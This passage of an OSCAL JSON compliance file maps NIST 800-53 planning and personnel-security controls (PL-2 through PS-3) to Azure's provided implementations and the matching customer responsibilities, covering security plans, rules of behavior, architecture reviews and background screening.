statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"370d690a-a409-4616-bba7-6c84c44f0db3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.c","by-components":[{"uuid":"21043baa-5a7a-4c11-bd09-65480c465265","export":{"provided":[{"uuid":"88dbfef3-b72c-4f68-881e-9176c7795d30","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-008"}],"description":"Microsoft works with service teams to review the Azure System Security Plan on an annual basis or when there is a major change to the system at a minimum. Microsoft coordinates these reviews to address changes to the Azure security implementations or problems identified during plan implementation or security control assessments. 
In addition to the formal update process, the Azure Compliance team regularly updates the SSP with internal and external customer feedback, process updates, and service improvements."}],"responsibilities":[{"uuid":"b1c932d4-dd8b-459b-93f2-6f1f4c33ee2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-008"}],"description":"The customer is responsible for reviewing the system security plan.","provided-uuid":"88dbfef3-b72c-4f68-881e-9176c7795d30"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8e7f7bc4-b2f8-4c22-8463-2fa49beaadb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.d","by-components":[{"uuid":"a48c97fe-dc04-4218-bae2-8f67d598210a","export":{"provided":[{"uuid":"daa37497-52b1-4994-a983-a7c1f0540c51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-009"}],"description":"Microsoft makes updates to the Azure System Security Plan as service teams make changes to the Azure security implementations or the Azure environment to ensure the plan represents an accurate depiction of the Azure security posture. Microsoft coordinates and updates the plan to address changes to the Azure cloud or the network or problems identified during plan implementation or security control assessments. Microsoft formally updates the Azure SSP annually via submission to the regulator. 
This regulator submission includes upload and maintenance of any regulator Assessment and Authorization (A&A) tooling, including eMASS, Xacta, RSA Archer, CSAM, and more. In addition to the formal update process, the Azure Compliance team regularly updates the SSP with internal and external customer feedback, process updates, and service improvements."}],"responsibilities":[{"uuid":"ce662e3b-b15f-47ee-ba5f-85b214fed8aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-009"}],"description":"The customer is responsible for updating the system security plan.","provided-uuid":"daa37497-52b1-4994-a983-a7c1f0540c51"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"811a7cd4-1fde-486a-a03a-fe46ddaf05d4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.e","by-components":[{"uuid":"8327c9f3-06d5-48b5-8cfb-023d86b2dc9f","export":{"provided":[{"uuid":"caba32ad-4751-4db1-b396-efdb7d2a03bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-010"}],"description":"The System Security Plan is posted on the internal Azure SharePoint and protected using SharePoint's built-in confidentiality and integrity protection mechanisms. 
This SharePoint is used for dissemination only to Azure personnel and relevant external parties."}],"responsibilities":[{"uuid":"74da663e-97c4-4a5d-a437-614ad811fb22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-010"}],"description":"The customer is responsible for protecting the system security plan.","provided-uuid":"caba32ad-4751-4db1-b396-efdb7d2a03bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7786ada8-b4d4-4b40-aa9b-c33a69bcfd67","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-4","statements":[{"uuid":"dcf5710b-72c6-4054-82f8-820a71d4bdaa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4_smt.a","by-components":[{"uuid":"fc9519e1-4eae-4f83-abbd-75f95d4da725","export":{"provided":[{"uuid":"a2f7df9d-264f-4099-b0ff-3938e56dac42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-011"}],"description":"Microsoft establishes and makes readily available to all Microsoft personnel the Microsoft Acceptable Use Standard which describes Microsoft internal user responsibilities and outlines the Online Services specific acceptable usage standards of the Infrastructure and Services technology assets. The agreements are put in place to protect trade secrets, sensitive, or business confidential information and assets. 
Additionally, the Microsoft Security Program Policy (MSPP) describes Microsoft user responsibilities and establishes expected behavior when using Azure and other Microsoft services. All Microsoft personnel, including FTEs, vendors, and contingent staff are required to follow the rules of behavior, which are outlined in the Microsoft Security Program Policy (MSPP) that describes user responsibilities and establishes expected behavior when using Azure and Microsoft services. The Employee Agreement, the new hire orientation process, and the Microsoft Security Policy (MSP) include statements regarding information and asset protection responsibilities. They also describe the penalties for the violation of these responsibilities. Also communicated via training, Microsoft Services' security responsibilities extend outside of the work site, beyond the standard operating hours of their employment, and these responsibilities continue for a defined period after employment ends. All Azure personnel are required to sign an Employee Agreement, as well as other paperwork acknowledging training provided in the new hire orientation process, as a condition for employment. All Azure personnel must provide a signed confirmation indicating understanding and agreement of these expectations prior to gaining access to Microsoft's network. The annual fulfillment of the Security Foundations Training is signed by all personnel and meets the requirements for the rules of behavior and access agreements. At the end of the Security Foundations Training, the personnel must check a box acknowledging that they have access to the Microsoft Policy and will abide by those policies. 
All personnel also must take the Standards of Business Conduct (SBC) training, which includes additional information on responsibilities."}],"responsibilities":[{"uuid":"6ceda1aa-e8d7-4e62-834c-5148f8e01c5a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-011"}],"description":"The customer is responsible for establishing rules of behavior.","provided-uuid":"a2f7df9d-264f-4099-b0ff-3938e56dac42"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"27c9b611-1a6d-491f-aaa4-33ebef29591b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-012"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4_smt.b","by-components":[{"uuid":"bc22ac8c-c88d-47db-b33a-0756c8c4f2f1","export":{"provided":[{"uuid":"5efd51de-9c95-4f59-963a-40b3cc26a184","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-012"}],"description":"In accordance with the Microsoft Security Policy, Microsoft requires signed acknowledgment from personnel indicating that they have read, understand, and agree to abide by user requirements before gaining authorized access to Azure. All Azure personnel are required to sign an Employee Agreement with non-disclosure provisions, as well as acknowledging security training provided in the new hire orientation process, at the time of hiring as a condition for employment. 
This signature acknowledges the terms and conditions of their role and their understanding and acceptance of the Microsoft corporate policies (including the Microsoft Security Program Policy (MSPP)). Contingent staff members (vendors and subcontractors) are required to sign and acknowledge the Microsoft Resource Access Agreement prior to being granted access to Microsoft information and services. Additionally, contingent staff members inherit the responsibilities based on the agreement between Microsoft and their respective organizations as detailed in respective contracts. All Azure personnel are also required to sign an Employee Agreement."}],"responsibilities":[{"uuid":"4ff42f42-002c-486d-bcd1-b1845fc7103b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-012"}],"description":"The customer is responsible for obtaining signed acknowledgment of the rules of behavior from system users.","provided-uuid":"5efd51de-9c95-4f59-963a-40b3cc26a184"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"946d7649-9650-42a0-8df1-ec33fe89f732","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-013"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4_smt.c","by-components":[{"uuid":"ee60bf96-b2c3-4973-92ca-4b988894f0af","export":{"provided":[{"uuid":"7d0e2cbb-1e6e-4b76-8676-4bf8546adae9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-013"}],"description":"Microsoft reviews the Non-Disclosure Agreement, the Microsoft Security Policy and other contractual 
paperwork signed during the new hire orientation process at least annually. If changes are needed, Microsoft updates the paperwork during the annual review. The paperwork is updated on an annual basis. On an annual basis, Microsoft employees are required to review the rules of behavior through the annual Security Foundations training. Personnel signature is evidenced through the successful completion of the security training which requires in-course attestation. The security training which includes the rules of behavior is updated annually."}],"responsibilities":[{"uuid":"d8030e68-0adf-4a1e-81f2-0db6ada60cde","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-013"}],"description":"The customer is responsible for reviewing and updating the rules of behavior.","provided-uuid":"7d0e2cbb-1e6e-4b76-8676-4bf8546adae9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"965a2a65-496f-4380-b17c-a01587754766","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4_smt.d","by-components":[{"uuid":"b9ede9ef-a4e6-4299-8daf-572a745afc8c","export":{"provided":[{"uuid":"c0b506c8-6526-45d4-b5ff-a990f33239b4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-014"}],"description":"After revisions, the revised document is included in annual security awareness training, which all personnel must take and sign upon 
completion."}],"responsibilities":[{"uuid":"b7ecd00c-843f-4915-99c5-473ed2c39e39","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-014"}],"description":"The customer is responsible for obtaining signed acknowledgment of the updated rules of behavior from system users.","provided-uuid":"c0b506c8-6526-45d4-b5ff-a990f33239b4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"375bd75e-e03b-4ca7-9742-e6d6ebdb1b68","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-4.1","statements":[{"uuid":"0c9092aa-4dd9-4759-9575-e86aaa5a6e09","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-4.1_smt","by-components":[{"uuid":"fd27e1a1-3848-4f75-87a1-52630bd4ddd0","export":{"provided":[{"uuid":"cf50f7a3-d3ca-41e6-b9f1-bb5fc1244635","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-015"}],"description":"The Microsoft security awareness training includes explicit restrictions on the use of social media/networking sites and posting organizational information on public websites, and is also included in training provided during the new hire orientation process."}],"responsibilities":[{"uuid":"cf985138-025c-426a-86b9-a0aa307e13a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-015"}],"description":"The customer is responsible for including restrictions on the use of 
social media/networking sites and posting organizational information on public websites in the rules of behavior.","provided-uuid":"cf50f7a3-d3ca-41e6-b9f1-bb5fc1244635"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c066e4c5-3476-47eb-90c5-f581303fe51c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-8","statements":[{"uuid":"86107c90-2c27-4c77-918c-3266b145890c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-8_smt.a","by-components":[{"uuid":"53787454-72a1-4d39-a8ea-be6642ba486b","export":{"provided":[{"uuid":"d6a0f1b3-a106-4f2c-b020-d878553e6057","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-016"}],"description":"Azure's security and privacy architecture describes: * The overall philosophy, requirements, and approach to be taken with regard to protecting the confidentiality, integrity, and availability of data relevant to and stored within Azure * Standards in place to process personally identifiable information to minimize privacy risk * The integration of Azure architecture into Azure's Infrastructure architecture * Assumptions about and dependencies on external services Guidance for the development of the information system architecture for Azure is included in the Microsoft Security Program Policy (MSPP), MSP-08 Operations Security. 
Documented Operating Procedures, Service Architecture, and Threat Modeling Operating procedures for services providing Microsoft's services must also be formally documented, approved, and communicated and should contain, at a minimum, those processes that impact the confidentiality, integrity, or availability of a system and critical data. Service architecture must be documented and threat modeling is performed to identify security threats to the service and ensure adequate mitigations are in place. System operations staff must develop a security configuration baseline for services and ensure that services are implemented according to the approved security configuration baseline. Antivirus and Anti-Malware Protection All Microsoft services must be protected from malicious software and hardware. Microsoft personnel are made aware of the potential dangers resulting from circumvention of network controls, such as downloading files from unknown or untrusted sources or providing inappropriate access. Security incidents that occur must be logged, verified, retained, secured, and appropriate corrective actions must be taken in response to these events. Security Logging, Monitoring, and Reporting System operations staff must implement monitoring technology and/or procedures to ensure timely detection and response to security incidents. Audit logs must be examined in a timely manner, and all identified anomalies must be investigated for possible misuse or compromise. Any log event which indicates a potential violation of Microsoft's Security Policy must be brought to the attention of the respective organization's appropriate service team. System operations staff must ensure key services have appropriate logging enabled and securely transmit logs to a central collection point. Logs must be maintained for a specified period of time according to standards. Monitoring and reporting tools must be available and used to assess the security posture of Microsoft. 
Change Control and Acceptance An operational change control procedure must be in place for each operational service team within Microsoft. These procedures must include a process for organizational management review and approval. These change control procedures must be communicated to all parties (Microsoft and third parties) who perform system maintenance on or in any of Microsoft's facilities. Acceptance criteria must be established by each security organization for new services, upgrades to existing services, and changes to processes to ensure services meet this security policy and any associated procedures and standards. Security Vulnerabilities and Penetration Testing To help prevent the risk of exposure to known security vulnerabilities, it is the responsibility of each Asset Owner to ensure their services have the latest security related patches. Systems operations staff must proactively monitor the service assets for possible exposures. This monitoring must include scanning for known system vulnerabilities and penetration testing from outside as well as inside Microsoft's environment. These activities must be scheduled and conducted in such a fashion as to minimize impact to the environment or organization. 
The frequency of scanning and penetration testing is determined by the sensitivity and criticality of the system."}],"responsibilities":[{"uuid":"4f8d356a-7100-45f1-88ec-1e1245b56e2e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-016"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing an information security and privacy architecture for customer-deployed resources.","provided-uuid":"d6a0f1b3-a106-4f2c-b020-d878553e6057"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e828ff7d-dffe-4fb8-8368-b91403ab1a23","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-8_smt.b","by-components":[{"uuid":"c07333bd-4e46-40e9-9207-a5c4ae71164a","export":{"provided":[{"uuid":"7325864b-0121-43f3-9c00-5e703faef407","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-017"}],"description":"Azure reviews and updates the information security architecture annually and when significant changes are made to Azure architecture or changes are made within the Microsoft Security Program Policy (MSPP)."}],"responsibilities":[{"uuid":"25133da1-ba7f-49f6-9182-b945c00439b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-017"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the information security architecture.","provided-uuid":"7325864b-0121-43f3-9c00-5e703faef407"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"85592790-72a1-4745-af4c-7e4484d9949d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-8_smt.c","by-components":[{"uuid":"845121b9-bfab-4ad4-bc6b-1b8f085e72c2","export":{"provided":[{"uuid":"532db113-c11a-4107-a0cb-cb9e7f404988","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-018"}],"description":"Azure updates this System Security Plan and all Azure procurement/acquisition procedures annually or whenever the information security architecture changes."}],"responsibilities":[{"uuid":"3aeae3a7-22de-4b4e-942d-cd9ffb6e080c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-018"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for accounting for planned changes to the information security architecture.","provided-uuid":"532db113-c11a-4107-a0cb-cb9e7f404988"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ea9f212f-e4ab-485a-b99f-9f7f9e253927","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-10","statements":[{"uuid":"fa98cc7e-4f46-4efe-bcde-1c3ba863f7c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-10_smt","by-components":[{"uuid":"ed1f4fbe-e911-4f5d-a196-372c3675f20d","export":{"provided":[{"uuid":"0965e5e8-6aee-4027-ab80-e7a97ffc98e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-019"}],"description":"Azure implements NIST 800-53 rev 5 security control baselines that have been selected by FedRAMP Program Management Office (PMO) to support FedRAMP High compliance requirements and by United States DoD regulators to support DoD SRG compliance requirements. Azure employs an approved Third-Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure in accordance with security control requirements. 
The results of this assessment and related activities are submitted to Azure's authorizing officials."}],"responsibilities":[{"uuid":"f983ec06-f49b-4214-a222-f02b47a2204e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-019"}],"description":"The customer is responsible for selecting a control baseline for customer-deployed resources.","provided-uuid":"0965e5e8-6aee-4027-ab80-e7a97ffc98e3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1fd5556b-9a6e-496b-b869-039fe2cc4812","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-11","statements":[{"uuid":"721d16a1-a300-4a44-9529-a42dc04b5fe1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-11_smt","by-components":[{"uuid":"fa28020f-a1db-43b4-98c1-d95d15a52918","export":{"provided":[{"uuid":"ad2b333f-5746-4708-8c60-5ca3cef4234b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-020"}],"description":"Azure implements NIST 800-53 rev 5 security control baselines that have been selected by FedRAMP Program Management Office (PMO) to support FedRAMP High compliance requirements and by United States DoD regulators to support DoD SRG compliance requirements. Azure designs and tailors processes around the security controls, where the spirit of the controls is addressed by taking mitigation actions on identified risks. 
Azure employs an approved Third-Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure in accordance with security control requirements. The results of this assessment and related activities are submitted to Azure's authorizing officials."}],"responsibilities":[{"uuid":"61d90e73-600f-4bda-b3ec-be32b3efb9b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-020"}],"description":"The customer is responsible for tailoring selected control baseline by applying specified tailoring actions for customer-deployed systems.","provided-uuid":"ad2b333f-5746-4708-8c60-5ca3cef4234b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8534e15b-73b5-45de-a88e-cd1ce069191d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-2","statements":[{"uuid":"fec7c421-cacf-444f-830f-76f2453e11d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-2_smt.a","by-components":[{"uuid":"6eb36226-e338-4c90-b8a4-aafe3b7976bf","export":{"provided":[{"uuid":"baed1598-790e-4b0b-a946-11f8df2e8fd9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-006"}],"description":"Microsoft ensures that all Azure personnel including subcontractors have risk designations in place based on role assignments. 
The risk designation is based on the asset classification assigned to information accessed, including federal customer data. Asset classification is determined through the types of information the asset contains."}],"responsibilities":[{"uuid":"7fba2349-6b71-49b6-808b-a2d734035a3f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-006"}],"description":"The customer is responsible for assigning risk designations to positions.","provided-uuid":"baed1598-790e-4b0b-a946-11f8df2e8fd9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c530179c-34ec-48c2-8cc3-b52130271661","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-2_smt.b","by-components":[{"uuid":"c40ee184-c186-4889-bbcf-9eabf66dcbaa","export":{"provided":[{"uuid":"084dd0a4-244f-45d9-9468-99c4441a27d4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-007"}],"description":"Azure, in coordination with Microsoft Human Resources (HR), establishes screening criteria for Azure service team personnel by reviewing positions for risk as well as considering customer expectations. 
All personnel require the Microsoft Cloud Screen."}],"responsibilities":[{"uuid":"5a80bb5e-6073-427f-b68f-ae0a40c39615","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-007"}],"description":"The customer is responsible for establishing screening criteria to screen individuals filling the positions identified in PS-02.a.","provided-uuid":"084dd0a4-244f-45d9-9468-99c4441a27d4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d12bf455-1b5a-4118-aa3d-4f04653a648a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-2_smt.c","by-components":[{"uuid":"54a132f1-4b98-4518-a358-a192b86a04fd","export":{"provided":[{"uuid":"7f05e92f-0ae2-4270-af03-8d2155a64188","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-008"}],"description":"Microsoft reviews the position risk designations as part of the annual Personnel Screening SOP update. 
All positions are subject to screening requirements."}],"responsibilities":[{"uuid":"aa688ab6-ef77-4cde-8706-964d3437d7d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-008"}],"description":"The customer is responsible for reviewing and updating risk designations on a customer-defined frequency.","provided-uuid":"7f05e92f-0ae2-4270-af03-8d2155a64188"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"58fd85d7-aee7-491d-958c-ea6f7c698c4a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ps-3","statements":[{"uuid":"0faa577f-5160-447b-9d09-cefeacf8729a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ps-3_smt.a","by-components":[{"uuid":"5dc6b1bd-1a93-4908-ba43-31cbefaf60a3","export":{"provided":[{"uuid":"5fc6d483-125e-40cf-bdac-4e845fd2e637","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PS-13-009"}],"description":"The Microsoft Security department conducts background checks and enforces the screening policies for all personnel. Background checks in the form of the Microsoft Cloud Screen are required for new hires or personnel transferring to positions that involve access to customers' work sites and/or sensitive areas, including access to customer PII. 
